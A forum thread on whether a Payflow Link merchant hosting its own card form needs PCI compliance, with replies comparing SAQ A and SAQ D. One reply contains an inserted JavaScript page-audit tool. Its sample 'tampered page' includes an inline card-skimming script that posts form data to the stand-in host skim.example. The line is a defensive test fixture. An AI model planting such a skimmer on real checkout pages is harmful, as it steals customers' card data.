Does Payflow Link require PCI compliance?

Posted 2024-09-11 03:30:56 · 375 characters · 1 view · 0 comments

I have tried calling PayPal themselves, and the rep on the phone didn't even know Payflow Link could work this way, so I don't trust his advice. All my searching has encountered mixed answers.

I am building an ecommerce site using Payflow Link, where the CC processing is handled on Paypal hosted pages. However, I am considering implementing the advanced integration method, whereby customers input all the CC info on a form hosted by my server, but the form gets POSTed over SSL directly to Paypal's servers. Using this method, I can maintain the branding of my site except for the required Paypal receipt page.

The CC information, using this method, should never touch my servers. Are they required to be PCI compliant? From a technical standpoint, I can't see why it should, but from a legal standpoint, I get lost in the jargon of the PCI-DSS documents. The site does roughly 1000 transactions a year.

3 comments

小清晰的声音 2024-09-18 03:30:56

I'm exploring the same issue. From talking to our PCI compliance vendor, it sounds like MikeH is incorrect. Because we're hosting the form on our web site, the server itself needs to be PCI compliant. That's because the form could be hacked if the server is not secure.

I see two options:

  1. Keep the form on our site. Make the server secure (our web host does not currently pass the PCI scan; they are working on it). Fill in the much longer and more detailed SAQ Validation Type 5 (Questionnaire D).

  2. Use Payflow Link's credit card capture form. Won't need to worry about the server, can then use the much shorter SAQ Validation Type 1 (Questionnaire A). But, we lose branding and may lose sales because the Payflow Link pages look so different.

The SAQ D is ugly :-(
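The concern in this comment (a form served by the merchant can be altered) and the direct-POST model from the question can both be checked mechanically against the page as served. The audit below is an added example, not code from this thread or from PayPal: it parses a merchant-hosted checkout page and reports any form carrying card fields that does not post straight to an allow-listed processor host over HTTPS, plus any script, inline or first-party, that could read those fields before the browser submits them. The processor host `payflow.example`, the card field names and both sample pages are constructed assumptions; substitute the endpoint and parameter names from the processor's own documentation.

```javascript
// Added example (not from the original thread or from PayPal): audit a
// merchant-hosted payment page to confirm that card fields go straight to
// the processor over HTTPS and that nothing served by the merchant can read
// them first. Processor host, field names and sample pages are constructed.

// Field names treated as cardholder data. Assumed names; map them to the
// processor's documented parameter names in practice.
const CARD_FIELD = /^(?:card(?:num|number|_number)|ccnum|cc_number|acct|expdate|exp(?:month|year|iry)?|cvv2?|cvc|csc)$/i;

// Read one attribute value out of a tag's attribute string.
function attr(attrs, name) {
  const m = new RegExp(`(?:^|\\s)${name}\\s*=\\s*(?:"([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i').exec(attrs);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// Enumerate <form> blocks with their attribute string and inner HTML.
function forms(html) {
  const out = [];
  const re = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  for (let m; (m = re.exec(html)) !== null;) out.push({ attrs: m[1], body: m[2] });
  return out;
}

// Names of the input controls inside a form body.
function fieldNames(body) {
  const names = [];
  const re = /<(?:input|select|textarea)\b([^>]*)>/gi;
  for (let m; (m = re.exec(body)) !== null;) {
    const n = attr(m[1], 'name');
    if (n !== null) names.push(n);
  }
  return names;
}

function parseUrl(s) {
  try { return new URL(s); } catch { return null; }
}

// Returns a list of findings. An empty list means every card form posts
// directly to an allowed processor host over HTTPS and no script on the
// page can intercept the values. allowedHosts lists processor hosts only.
function auditPaymentPage(html, allowedHosts) {
  const findings = [];
  for (const f of forms(html)) {
    const cardFields = fieldNames(f.body).filter((n) => CARD_FIELD.test(n));
    if (cardFields.length === 0) continue; // not a payment form
    const action = attr(f.attrs, 'action') ?? '';
    const method = (attr(f.attrs, 'method') ?? 'get').toLowerCase();
    const url = parseUrl(action);
    if (url === null) {
      // Relative or missing action: the browser posts the card data back to
      // the merchant server, which then handles it and is fully in scope.
      findings.push(`card form action "${action}" resolves to this server`);
    } else {
      if (url.protocol !== 'https:') findings.push(`card form posts over ${url.protocol.replace(':', '')}`);
      if (!allowedHosts.includes(url.hostname)) findings.push(`card form posts to unexpected host ${url.hostname}`);
    }
    if (method !== 'post') findings.push(`card fields ${cardFields.join(',')} sent with ${method.toUpperCase()}; values would land in URLs and logs`);
  }
  // Every script on the page runs with access to the form before submission,
  // so every script is on the cardholder data path. Only processor-served
  // scripts are tolerated here; first-party ones put the server in scope.
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  for (let m; (m = scriptRe.exec(html)) !== null;) {
    const src = attr(m[1], 'src');
    if (src === null) {
      if (m[2].trim() !== '') findings.push('inline script can read card fields before submission');
      continue;
    }
    const u = parseUrl(src);
    if (u === null || !allowedHosts.includes(u.hostname)) findings.push(`script ${src} is served outside the processor and can read card fields`);
  }
  return findings;
}

// Constructed sample pages. "payflow.example" stands in for the processor's
// documented hosted-form endpoint; it is not a real host.
const PROCESSOR_HOSTS = ['payflow.example'];

const DIRECT_POST_PAGE = `
<form action="https://payflow.example/hosted/submit" method="post">
  <input name="ACCT" type="text">
  <input name="EXPDATE" type="text">
  <input name="CVV2" type="password">
  <input name="AMOUNT" type="hidden" value="19.99">
  <button type="submit">Pay</button>
</form>`;

// Same page after the merchant server was altered: form now posts to the
// merchant, a first-party script is loaded, and an inline handler copies
// the submitted fields elsewhere.
const TAMPERED_PAGE = `
<script src="/static/analytics.js"></script>
<form action="/checkout/charge" method="post">
  <input name="cardnum" type="text">
  <input name="cvv" type="text">
</form>
<script>document.forms[0].addEventListener('submit', e => fetch('https://skim.example', {method:'POST', body: new FormData(e.target)}));</script>`;

for (const [label, page] of [['direct-post page', DIRECT_POST_PAGE], ['tampered page', TAMPERED_PAGE]]) {
  console.log(label, auditPaymentPage(page, PROCESSOR_HOSTS));
}
```

Run against the two constructed pages, the direct-post page yields no findings and the tampered page yields three (form posts back to the merchant, first-party script, inline script). A clean result only says the page as served has the right shape; it does not settle the scope question this comment raises, because whoever can change the page can also change what the audit sees, so the check is worth running against the live page on a schedule rather than once at build time.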

┾廆蒐ゝ 2024-09-18 03:30:56

Using the model you are proposing, you do indeed have to be PCI-compliant, but at a much less restrictive level than you would if the data touched your server.

For details, go to https://www.pcisecuritystandards.org/saq/instructions_dss.shtml and click on the link for SAQ Validation Type 1 (Questionnaire A). This will tell you exactly what parts of the PCI DSS you must implement as a merchant with all cardholder functions outsourced.

Hope this helps!

风苍溪 2024-09-18 03:30:56

If you accept credit card payments through your website you have to be PCI compliant. How far you need to go will vary depending on your implementation. If you're hosting the form that the users are using to make payments, you need to use an SSL certificate so that the page is encrypted (even if only to make sure the lock icon appears in the user's browser. Without it you won't be doing 1000 transactions per year anymore).
